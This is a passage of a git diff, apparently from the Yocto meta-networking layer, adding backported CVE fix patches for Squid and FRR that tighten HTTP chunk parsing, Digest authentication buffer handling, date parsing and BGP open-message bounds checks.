<yadij@users.noreply.github.com> +Date: Fri, 13 Oct 2023 08:44:16 +0000 +Subject: [PATCH] RFC 9112: Improve HTTP chunked encoding compliance (#1498) + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46846.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/05f6af2f4c85cc99323cfff6149c3d74af661b6d] +CVE: CVE-2023-46846 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/http/one/Parser.cc | 8 +------- + src/http/one/Parser.h | 4 +--- + src/http/one/TeChunkedParser.cc | 23 ++++++++++++++++++----- + src/parser/Tokenizer.cc | 12 ++++++++++++ + src/parser/Tokenizer.h | 7 +++++++ + 5 files changed, 39 insertions(+), 15 deletions(-) + +--- a/src/http/one/Parser.cc ++++ b/src/http/one/Parser.cc +@@ -65,16 +65,10 @@ Http::One::Parser::DelimiterCharacters() + void + Http::One::Parser::skipLineTerminator(Tokenizer &tok) const + { +- if (tok.skip(Http1::CrLf())) +- return; +- + if (Config.onoff.relaxed_header_parser && tok.skipOne(CharacterSet::LF)) + return; + +- if (tok.atEnd() || (tok.remaining().length() == 1 && tok.remaining().at(0) == '\r')) +- throw InsufficientInput(); +- +- throw TexcHere("garbage instead of CRLF line terminator"); ++ tok.skipRequired("line-terminating CRLF", Http1::CrLf()); + } + + /// all characters except the LF line terminator +--- a/src/http/one/Parser.h ++++ b/src/http/one/Parser.h +@@ -120,9 +120,7 @@ protected: + * detect and skip the CRLF or (if tolerant) LF line terminator + * consume from the tokenizer. + * +- * \throws exception on bad or InsuffientInput. +- * \retval true only if line terminator found. +- * \retval false incomplete or missing line terminator, need more data. ++ * \throws exception on bad or InsufficientInput + */ + void skipLineTerminator(Tokenizer &) const; + +--- a/src/http/one/TeChunkedParser.cc ++++ b/src/http/one/TeChunkedParser.cc +@@ -91,6 +91,11 @@ Http::One::TeChunkedParser::parseChunkSi + { + Must(theChunkSize <= 0); // Should(), really + ++ static const SBuf bannedHexPrefixLower("0x"); ++ static const SBuf bannedHexPrefixUpper("0X"); ++ if (tok.skip(bannedHexPrefixLower) || tok.skip(bannedHexPrefixUpper)) ++ throw TextException("chunk starts with 0x", Here()); ++ + int64_t size = -1; + if (tok.int64(size, 16, false) && !tok.atEnd()) { + if (size < 0) +@@ -121,7 +126,7 @@ Http::One::TeChunkedParser::parseChunkMe + // bad or insufficient input, like in the code below. TODO: Expand up. + try { + parseChunkExtensions(tok); // a possibly empty chunk-ext list +- skipLineTerminator(tok); ++ tok.skipRequired("CRLF after [chunk-ext]", Http1::CrLf()); + buf_ = tok.remaining(); + parsingStage_ = theChunkSize ? Http1::HTTP_PARSE_CHUNK : Http1::HTTP_PARSE_MIME; + return true; +@@ -132,12 +137,14 @@ Http::One::TeChunkedParser::parseChunkMe + // other exceptions bubble up to kill message parsing + } + +-/// Parses the chunk-ext list (RFC 7230 section 4.1.1 and its Errata #4667): ++/// Parses the chunk-ext list (RFC 9112 section 7.1.1: + /// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) + void +-Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &callerTok) + { + do { ++ auto tok = callerTok; ++ + ParseBws(tok); // Bug 4492: IBM_HTTP_Server sends SP after chunk-size + + if (!tok.skip(';')) +@@ -145,6 +152,7 @@ Http::One::TeChunkedParser::parseChunkEx + + parseOneChunkExtension(tok); + buf_ = tok.remaining(); // got one extension ++ callerTok = tok; + } while (true); + } + +@@ -158,11 +166,14 @@ Http::One::ChunkExtensionValueParser::Ig + /// Parses a single chunk-ext list element: + /// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) + void +-Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &tok) ++Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &callerTok) + { ++ auto tok = callerTok; ++ + ParseBws(tok); // Bug 4492: ICAP servers send SP before chunk-ext-name + + const auto extName = tok.prefix("chunk-ext-name", CharacterSet::TCHAR); ++ callerTok = tok; // in case we determine that this is a valueless chunk-ext + + ParseBws(tok); + +@@ -176,6 +187,8 @@ Http::One::TeChunkedParser::parseOneChun + customExtensionValueParser->parse(tok, extName); + else + ChunkExtensionValueParser::Ignore(tok, extName); ++ ++ callerTok = tok; + } + + bool +@@ -209,7 +222,7 @@ Http::One::TeChunkedParser::parseChunkEn + Must(theLeftBodySize == 0); // Should(), really + + try { +- skipLineTerminator(tok); ++ tok.skipRequired("chunk CRLF", Http1::CrLf()); + buf_ = tok.remaining(); // parse checkpoint + theChunkSize = 0; // done with the current chunk + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; +--- a/src/parser/Tokenizer.cc ++++ b/src/parser/Tokenizer.cc +@@ -147,6 +147,18 @@ Parser::Tokenizer::skipAll(const Charact + return success(prefixLen); + } + ++void ++Parser::Tokenizer::skipRequired(const char *description, const SBuf &tokenToSkip) ++{ ++ if (skip(tokenToSkip) || tokenToSkip.isEmpty()) ++ return; ++ ++ if (tokenToSkip.startsWith(buf_)) ++ throw InsufficientInput(); ++ ++ throw TextException(ToSBuf("cannot skip ", description), Here()); ++} ++ + bool + Parser::Tokenizer::skipOne(const CharacterSet &chars) + { +--- a/src/parser/Tokenizer.h ++++ b/src/parser/Tokenizer.h +@@ -115,6 +115,13 @@ public: + */ + SBuf::size_type skipAll(const CharacterSet &discardables); + ++ /** skips a given character sequence (string); ++ * does nothing if the sequence is empty ++ * ++ * \throws exception on mismatching prefix or InsufficientInput ++ */ ++ void skipRequired(const char *description, const SBuf &tokenToSkip); ++ + /** Removes a single trailing character from the set. + * + * \return whether a character was removed diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch new file mode 100644 index 0000000000..9071872c01 --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46847.patch @@ -0,0 +1,47 @@ +From 052cf082b0faaef4eaaa4e94119d7a1437aac4a3 Mon Sep 17 00:00:00 2001 +From: squidadm <squidadm@users.noreply.github.com> +Date: Wed, 18 Oct 2023 04:50:56 +1300 +Subject: [PATCH] Fix stack buffer overflow when parsing Digest Authorization + (#1517) + +The bug was discovered and detailed by Joshua Rogers at +https://megamansec.github.io/Squid-Security-Audit/digest-overflow.html +where it was filed as "Stack Buffer Overflow in Digest Authentication". + +--------- + +Co-authored-by: Alex Bason <nonsleepr@gmail.com> +Co-authored-by: Amos Jeffries <yadij@users.noreply.github.com> + +Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/052cf082b0faaef4eaaa4e94119d7a1437aac4a3] +CVE: CVE-2023-46847 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + src/auth/digest/Config.cc | 10 +++++++--- + 1 file changed, 7 insertions(+), 3 deletions(-) + +diff --git a/src/auth/digest/Config.cc b/src/auth/digest/Config.cc +index 6a9736f..0a883fa 100644 +--- a/src/auth/digest/Config.cc ++++ b/src/auth/digest/Config.cc +@@ -847,11 +847,15 @@ Auth::Digest::Config::decode(char const *proxy_auth, const char *aRequestRealm) + break; + + case DIGEST_NC: +- if (value.size() != 8) { ++ if (value.size() == 8) { ++ // for historical reasons, the nc value MUST be exactly 8 bytes ++ static_assert(sizeof(digest_request->nc) == 8 + 1, "bad nc buffer size"); ++ xstrncpy(digest_request->nc, value.rawBuf(), value.size() + 1); ++ debugs(29, 9, "Found noncecount '" << digest_request->nc << "'"); ++ } else { + debugs(29, 9, "Invalid nc '" << value << "' in '" << temp << "'"); ++ digest_request->nc[0] = 0; + } +- xstrncpy(digest_request->nc, value.rawBuf(), value.size() + 1); +- debugs(29, 9, "Found noncecount '" << digest_request->nc << "'"); + break; + + case DIGEST_CNONCE: +-- +2.40.1 diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch new file mode 100644 index 0000000000..6909f754f3 --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-49285.patch @@ -0,0 +1,37 @@ +From 77b3fb4df0f126784d5fd4967c28ed40eb8d521b Mon Sep 17 00:00:00 2001 +From: Alex Rousskov <rousskov@measurement-factory.com> +Date: Wed, 25 Oct 2023 19:41:45 +0000 +Subject: [PATCH] RFC 1123: Fix date parsing (#1538) + +The bug was discovered and detailed by Joshua Rogers at +https://megamansec.github.io/Squid-Security-Audit/datetime-overflow.html +where it was filed as "1-Byte Buffer OverRead in RFC 1123 date/time +Handling". + +Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/77b3fb4df0f126784d5fd4967c28ed40eb8d521b] +CVE: CVE-2023-49285 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + lib/rfc1123.c | 6 ++++++ + 1 file changed, 6 insertions(+) + +diff --git a/lib/rfc1123.c b/lib/rfc1123.c +index 2d889cc..add63f0 100644 +--- a/lib/rfc1123.c ++++ b/lib/rfc1123.c +@@ -50,7 +50,13 @@ make_month(const char *s) + char month[3]; + + month[0] = xtoupper(*s); ++ if (!month[0]) ++ return -1; // protects *(s + 1) below ++ + month[1] = xtolower(*(s + 1)); ++ if (!month[1]) ++ return -1; // protects *(s + 2) below ++ + month[2] = xtolower(*(s + 2)); + + for (i = 0; i < 12; i++) +-- +2.39.3 diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch new file mode 100644 index 0000000000..8e0bdf387c --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-49286.patch @@ -0,0 +1,87 @@ +From 6014c6648a2a54a4ecb7f952ea1163e0798f9264 Mon Sep 17 00:00:00 2001 +From: Alex Rousskov <rousskov@measurement-factory.com> +Date: Fri, 27 Oct 2023 21:27:20 +0000 +Subject: [PATCH] Exit without asserting when helper process startup fails + (#1543) + +... to dup() after fork() and before execvp(). + +Assertions are for handling program logic errors. Helper initialization +code already handled system call errors correctly (i.e. by exiting the +newly created helper process with an error), except for a couple of +assert()s that could be triggered by dup(2) failures. + +This bug was discovered and detailed by Joshua Rogers at +https://megamansec.github.io/Squid-Security-Audit/ipc-assert.html +where it was filed as 'Assertion in Squid "Helper" Process Creator'. + +Origin: http://www.squid-cache.org/Versions/v6/SQUID-2023_8.patch + +Upstream-Status: Backport [https://github.com/squid-cache/squid/commit/6014c6648a2a54a4ecb7f952ea1163e0798f9264] +CVE: CVE-2023-49286 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/ipc.cc | 33 +++++++++++++++++++++++++++------ + 1 file changed, 27 insertions(+), 6 deletions(-) + +--- a/src/ipc.cc ++++ b/src/ipc.cc +@@ -20,6 +20,12 @@ + #include "SquidIpc.h" + #include "tools.h" + ++#include <cstdlib> ++ ++#if HAVE_UNISTD_H ++#include <unistd.h> ++#endif ++ + static const char *hello_string = "hi there\n"; + #ifndef HELLO_BUF_SZ + #define HELLO_BUF_SZ 32 +@@ -365,6 +371,22 @@ + } + + PutEnvironment(); ++ ++ // A dup(2) wrapper that reports and exits the process on errors. The ++ // exiting logic is only suitable for this child process context. ++ const auto dupOrExit = [prog,name](const int oldFd) { ++ const auto newFd = dup(oldFd); ++ if (newFd < 0) { ++ const auto savedErrno = errno; ++ debugs(54, DBG_CRITICAL, "ERROR: Helper process initialization failure: " << name); ++ debugs(54, DBG_CRITICAL, "helper (CHILD) PID: " << getpid()); ++ debugs(54, DBG_CRITICAL, "helper program name: " << prog); ++ debugs(54, DBG_CRITICAL, "dup(2) system call error for FD " << oldFd << ": " << xstrerr(savedErrno)); ++ _exit(1); ++ } ++ return newFd; ++ }; ++ + /* + * This double-dup stuff avoids problems when one of + * crfd, cwfd, or debug_log are in the rage 0-2. +@@ -372,17 +394,16 @@ + + do { + /* First make sure 0-2 is occupied by something. Gets cleaned up later */ +- x = dup(crfd); +- assert(x > -1); +- } while (x < 3 && x > -1); ++ x = dupOrExit(crfd); ++ } while (x < 3); + + close(x); + +- t1 = dup(crfd); ++ t1 = dupOrExit(crfd); + +- t2 = dup(cwfd); ++ t2 = dupOrExit(cwfd); + +- t3 = dup(fileno(debug_log)); ++ t3 = dupOrExit(fileno(debug_log)); + + assert(t1 > 2 && t2 > 2 && t3 > 2); + diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch new file mode 100644 index 0000000000..51c895e0ef --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-50269.patch @@ -0,0 +1,62 @@ +From: Markus Koschany <apo@debian.org> +Date: Tue, 26 Dec 2023 19:58:12 +0100 +Subject: CVE-2023-50269 + +Bug-Debian: https://bugs.debian.org/1058721 +Origin: http://www.squid-cache.org/Versions/v5/SQUID-2023_10.patch + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-50269.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/9f7136105bff920413042a8806cc5de3f6086d6d] +CVE: CVE-2023-50269 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/ClientRequestContext.h | 4 ++++ + src/client_side_request.cc | 17 +++++++++++++++-- + 2 files changed, 19 insertions(+), 2 deletions(-) + +--- a/src/ClientRequestContext.h ++++ b/src/ClientRequestContext.h +@@ -81,6 +81,10 @@ + #endif + ErrorState *error; ///< saved error page for centralized/delayed processing + bool readNextRequest; ///< whether Squid should read after error handling ++ ++#if FOLLOW_X_FORWARDED_FOR ++ size_t currentXffHopNumber = 0; ///< number of X-Forwarded-For header values processed so far ++#endif + }; + + #endif /* SQUID_CLIENTREQUESTCONTEXT_H */ +--- a/src/client_side_request.cc ++++ b/src/client_side_request.cc +@@ -78,6 +78,11 @@ + static const char *const crlf = "\r\n"; + + #if FOLLOW_X_FORWARDED_FOR ++ ++#if !defined(SQUID_X_FORWARDED_FOR_HOP_MAX) ++#define SQUID_X_FORWARDED_FOR_HOP_MAX 64 ++#endif ++ + static void clientFollowXForwardedForCheck(allow_t answer, void *data); + #endif /* FOLLOW_X_FORWARDED_FOR */ + +@@ -485,8 +490,16 @@ + /* override the default src_addr tested if we have to go deeper than one level into XFF */ + Filled(calloutContext->acl_checklist)->src_addr = request->indirect_client_addr; + } +- calloutContext->acl_checklist->nonBlockingCheck(clientFollowXForwardedForCheck, data); +- return; ++ if (++calloutContext->currentXffHopNumber < SQUID_X_FORWARDED_FOR_HOP_MAX) { ++ calloutContext->acl_checklist->nonBlockingCheck(clientFollowXForwardedForCheck, data); ++ return; ++ } ++ const auto headerName = Http::HeaderLookupTable.lookup(Http::HdrType::X_FORWARDED_FOR).name; ++ debugs(28, DBG_CRITICAL, "ERROR: Ignoring trailing " << headerName << " addresses"); ++ debugs(28, DBG_CRITICAL, "addresses allowed by follow_x_forwarded_for: " << calloutContext->currentXffHopNumber); ++ debugs(28, DBG_CRITICAL, "last/accepted address: " << request->indirect_client_addr); ++ debugs(28, DBG_CRITICAL, "ignored trailing addresses: " << request->x_forwarded_for_iterator); ++ // fall through to resume clientAccessCheck() processing + } + } + diff --git a/meta-networking/recipes-daemons/squid/squid_4.15.bb b/meta-networking/recipes-daemons/squid/squid_4.15.bb index a1122a3cd4..69b62aa5a5 100644 --- a/meta-networking/recipes-daemons/squid/squid_4.15.bb +++ b/meta-networking/recipes-daemons/squid/squid_4.15.bb @@ -25,6 +25,13 @@ SRC_URI = "http://www.squid-cache.org/Versions/v${MAJ_VER}/${BPN}-${PV}.tar.bz2 file://0001-tools.cc-fixed-unused-result-warning.patch \ file://0001-splay.cc-fix-bind-is-not-a-member-of-std.patch \ file://0001-Fix-build-on-Fedora-Rawhide-772.patch \ + file://CVE-2023-46847.patch \ + file://CVE-2023-49285.patch \ + file://CVE-2023-46728.patch \ + file://CVE-2023-46846-pre1.patch \ + file://CVE-2023-46846.patch \ + file://CVE-2023-49286.patch \ + file://CVE-2023-50269.patch \ " SRC_URI:remove:toolchain-clang = "file://0001-configure-Check-for-Wno-error-format-truncation-comp.patch" diff --git a/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb b/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb index e078be79a1..080a0ed85c 100644 --- a/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb +++ b/meta-networking/recipes-filter/nftables/nftables_1.0.2.bb @@ -38,7 +38,7 @@ RDEPENDS:${PN}-ptest += " make bash python3-core python3-ctypes python3-json pyt TESTDIR = "tests" -PRIVATE_LIBS:${PN}-ptest:append = "libnftables.so.1" +PRIVATE_LIBS:${PN}-ptest:append = " libnftables.so.1" do_install_ptest() { cp -rf ${S}/build-aux ${D}${PTEST_PATH} diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch new file mode 100644 index 0000000000..c06de49eb3 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-36440.patch @@ -0,0 +1,71 @@ +From 02a0e45f66160f571196a105b217e1bb84d1a835 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 30 Sep 2022 08:51:45 -0400 +Subject: [PATCH] bgpd: Ensure FRR has enough data to read 2 bytes in + peek_for_as4_capability + +In peek_for_as4_capability the code is checking that the +stream has at least 2 bytes to read ( the opt_type and the +opt_length ). However if BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +is configured then FRR is reading 3 bytes. Which is not good +since the packet could be badly formated. Ensure that +FRR has the appropriate data length to read the data. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 3e46b43e3788f0f87bae56a86b54d412b4710286) + +CVE: CVE-2022-36440 +CVE: CVE-2022-40302 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/02a0e45f66160f571196a105b217e1bb84d1a835] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_open.c | 27 +++++++++++++++++++++------ + 1 file changed, 21 insertions(+), 6 deletions(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index c2562c75d3fc..fe4c24a8c979 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -1116,15 +1116,30 @@ as_t peek_for_as4_capability(struct peer *peer, uint16_t length) + uint8_t opt_type; + uint16_t opt_length; + +- /* Check the length. */ +- if (stream_get_getp(s) + 2 > end) ++ /* Ensure we can read the option type */ ++ if (stream_get_getp(s) + 1 > end) + goto end; + +- /* Fetch option type and length. */ ++ /* Fetch the option type */ + opt_type = stream_getc(s); +- opt_length = BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +- ? stream_getw(s) +- : stream_getc(s); ++ ++ /* ++ * Check the length and fetch the opt_length ++ * If the peer is BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) ++ * then we do a getw which is 2 bytes. So we need to ++ * ensure that we can read that as well ++ */ ++ if (BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer)) { ++ if (stream_get_getp(s) + 2 > end) ++ goto end; ++ ++ opt_length = stream_getw(s); ++ } else { ++ if (stream_get_getp(s) + 1 > end) ++ goto end; ++ ++ opt_length = stream_getc(s); ++ } + + /* Option length check. */ + if (stream_get_getp(s) + opt_length > end) +-- +2.40.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch new file mode 100644 index 0000000000..9d6dcfb920 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-40318.patch @@ -0,0 +1,81 @@ +From 72088b05d469a6b6a8b9a2b250885246ea0c2acb Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Fri, 30 Sep 2022 08:57:43 -0400 +Subject: [PATCH] bgpd: Ensure FRR has enough data to read 2 bytes in + bgp_open_option_parse + +In bgp_open_option_parse the code is checking that the +stream has at least 2 bytes to read ( the opt_type and +the opt_length). However if BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +is configured then FRR is reading 3 bytes. Which is not good +since the packet could be badly formateed. Ensure that +FRR has the appropriate data length to read the data. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 1117baca3c592877a4d8a13ed6a1d9bd83977487) + +CVE: CVE-2022-40318 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/72088b05d469a6b6a8b9a2b250885246ea0c2acb] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_open.c | 35 ++++++++++++++++++++++++++++------- + 1 file changed, 28 insertions(+), 7 deletions(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index fe4c24a8c979..de550d2ac607 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -1209,19 +1209,40 @@ int bgp_open_option_parse(struct peer *peer, uint16_t length, + uint8_t opt_type; + uint16_t opt_length; + +- /* Must have at least an OPEN option header */ +- if (STREAM_READABLE(s) < 2) { ++ /* ++ * Check that we can read the opt_type and fetch it ++ */ ++ if (STREAM_READABLE(s) < 1) { + zlog_info("%s Option length error", peer->host); + bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, + BGP_NOTIFY_OPEN_MALFORMED_ATTR); + return -1; + } +- +- /* Fetch option type and length. */ + opt_type = stream_getc(s); +- opt_length = BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer) +- ? stream_getw(s) +- : stream_getc(s); ++ ++ /* ++ * Check the length of the stream to ensure that ++ * FRR can properly read the opt_length. Then read it ++ */ ++ if (BGP_OPEN_EXT_OPT_PARAMS_CAPABLE(peer)) { ++ if (STREAM_READABLE(s) < 2) { ++ zlog_info("%s Option length error", peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return -1; ++ } ++ ++ opt_length = stream_getw(s); ++ } else { ++ if (STREAM_READABLE(s) < 1) { ++ zlog_info("%s Option length error", peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return -1; ++ } ++ ++ opt_length = stream_getc(s); ++ } + + /* Option length check. */ + if (STREAM_READABLE(s) < opt_length) { +-- +2.40.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch new file mode 100644 index 0000000000..73493bb120 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-42917.patch @@ -0,0 +1,36 @@ +From 5216a05b32390a64efeb598051411e1776042624 Mon Sep 17 00:00:00 2001 +From: Marius Tomaschewski <mt@suse.com> +Date: Fri, 11 Nov 2022 12:26:04 +0100 +Subject: [PATCH] tools: remove backslash from declare check regex + +The backslash in `grep -q '^declare \-a'` is not needed and +causes `grep: warning: stray \ before -` warning in grep-3.8. + +Signed-off-by: Marius Tomaschewski <mt@suse.com> + +CVE: CVE-2022-42917 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/5216a05b32390a64efeb598051411e1776042624] + +Signed-off-by: Yi Zhao <yi.zhao@windriver.com> +--- + tools/frrcommon.sh.in | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in +index 61f1abb37..3c16c27c6 100755 +--- a/tools/frrcommon.sh.in ++++ b/tools/frrcommon.sh.in +@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then + load_old_config "/etc/sysconfig/frr" + fi + +-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then ++if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then + log_warning_msg "watchfrr_options contains a bash array value." \ + "The configured value is intentionally ignored since it is likely wrong." \ + "Please remove or fix the setting." +-- +2.25.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch new file mode 100644 index 0000000000..77a011dbc9 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2022-43681.patch @@ -0,0 +1,58 @@ +From f316975cedd8ef17d47b56be0d3d21711fe44a25 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Wed, 2 Nov 2022 13:24:48 -0400 +Subject: [PATCH] bgpd: Ensure that bgp open message stream has enough data to + read + +If a operator receives an invalid packet that is of insufficient size +then it is possible for BGP to assert during reading of the packet +instead of gracefully resetting the connection with the peer. + +Signed-off-by: Donald Sharp <sharpd@nvidia.com> +(cherry picked from commit 766eec1b7accffe2c04a5c9ebb14e9f487bb9f78) + +CVE: CVE-2022-43681 + +Upstream-Status: Backport +[https://github.com/FRRouting/frr/commit/766eec1b7accffe2c04a5c9ebb14e9f487bb9f78] + +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_packet.c | 19 +++++++++++++++++++ + 1 file changed, 19 insertions(+) + +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index bcd47e32d453..5225db29fe09 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -1176,8 +1176,27 @@ static int bgp_open_receive(struct peer *peer, bgp_size_t size) + || CHECK_FLAG(peer->flags, PEER_FLAG_EXTENDED_OPT_PARAMS)) { + uint8_t opttype; + ++ if (STREAM_READABLE(peer->curr) < 1) { ++ flog_err( ++ EC_BGP_PKT_OPEN, ++ "%s: stream does not have enough bytes for extended optional parameters", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return BGP_Stop; ++ } ++ + opttype = stream_getc(peer->curr); + if (opttype == BGP_OPEN_NON_EXT_OPT_TYPE_EXTENDED_LENGTH) { ++ if (STREAM_READABLE(peer->curr) < 2) { ++ flog_err( ++ EC_BGP_PKT_OPEN, ++ "%s: stream does not have enough bytes to read the extended optional parameters optlen", ++ peer->host); ++ bgp_notify_send(peer, BGP_NOTIFY_OPEN_ERR, ++ BGP_NOTIFY_OPEN_MALFORMED_ATTR); ++ return BGP_Stop; ++ } + optlen = stream_getw(peer->curr); + SET_FLAG(peer->sflags, + PEER_STATUS_EXT_OPT_PARAMS_LENGTH); +-- +2.40.1 + diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch new file mode 100644 index 0000000000..6fd6792087 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31489.patch @@ -0,0 +1,52 @@ +From 4e1fc50394df0b69f32a9cf8ba8e1dcee2c67563 Mon Sep 17 00:00:00 2001 +From: Narpat Mali <narpat.mali@windriver.com> +Date: Tue, 20 Jun 2023 14:01:46 +0000 +Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart + capability + +It's not 4 bytes, it was assuming the same as Graceful-Restart tuples. +LLGR has more 3 bytes (Long-lived Stale Time). + +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> + +CVE: CVE-2023-31489 + +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b1d33ec293e8e36fbb8766252f3b016d268e31ce] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + bgpd/bgp_open.c | 14 +++++++++++++- + 1 file changed, 13 insertions(+), 1 deletion(-) + +diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c +index 6bdefd0e9..ad56149f6 100644 +--- a/bgpd/bgp_open.c ++++ b/bgpd/bgp_open.c +@@ -578,12 +578,24 @@ static int bgp_capability_restart(struct peer *peer, + static int bgp_capability_llgr(struct peer *peer, + struct capability_header *caphdr) + { ++/* ++ * +--------------------------------------------------+ ++ * | Address Family Identifier (16 bits) | ++ * +--------------------------------------------------+ ++ * | Subsequent Address Family Identifier (8 bits) | ++ * +--------------------------------------------------+ ++ * | Flags for Address Family (8 bits) | ++ * +--------------------------------------------------+ ++ * | Long-lived Stale Time (24 bits) | ++ * +--------------------------------------------------+ ++ */ ++#define BGP_CAP_LLGR_MIN_PACKET_LEN 7 + struct stream *s = BGP_INPUT(peer); + size_t end = stream_get_getp(s) + caphdr->length; + + SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV); + +- while (stream_get_getp(s) + 4 <= end) { ++ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) { + afi_t afi; + safi_t safi; + iana_afi_t pkt_afi = stream_getw(s); +-- +2.40.0 diff --git a/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch new file mode 100644 index 0000000000..893c856c66 --- /dev/null +++ b/meta-networking/recipes-protocols/frr/frr/CVE-2023-31490.patch @@ -0,0 +1,160 @@ +From 72c13aac2eb7c8f3a10ad806d80ab635c28f4c04 Mon Sep 17 00:00:00 2001 +From: Donald Sharp <sharpd@nvidia.com> +Date: Wed, 21 Jun 2023 15:24:50 +0000 +Subject: [PATCH] bgpd: Ensure stream received has enough data + +BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not +fully 